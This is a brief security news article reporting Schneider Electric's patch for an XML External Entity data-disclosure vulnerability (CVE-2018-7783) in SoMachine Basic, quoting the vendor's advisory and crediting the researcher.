Patch/Configuration Management, Vulnerability Management

Schneider Electric patches XML External Entity vulnerability


Schneider Electric patched a vulnerability (CVE-2018-7783) in its SoMachine Basic that could result in the disclosure or retrieval of data during an out-of-band attack.

The vulnerability was identified as an out-of-band remote arbitrary data retrieval issue that impacts all versions of SoMachne Basic prior to v1.6 SP1.

“SoMachine Basic suffers from an XML External Entity (XXE) vulnerability using the DTD parameter entities technique resulting in disclosure and retrieval of arbitrary data on the affected node via out-of-band (OOB) attack. The vulnerability is triggered when input passed to the XML parser is not sanitized while parsing the XML project/template file,” the company said in a security alert.

The patch can be found here. The flaw was discovered by Gjoko Krstikj of Applied Risk.

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms and Conditions and Privacy Policy.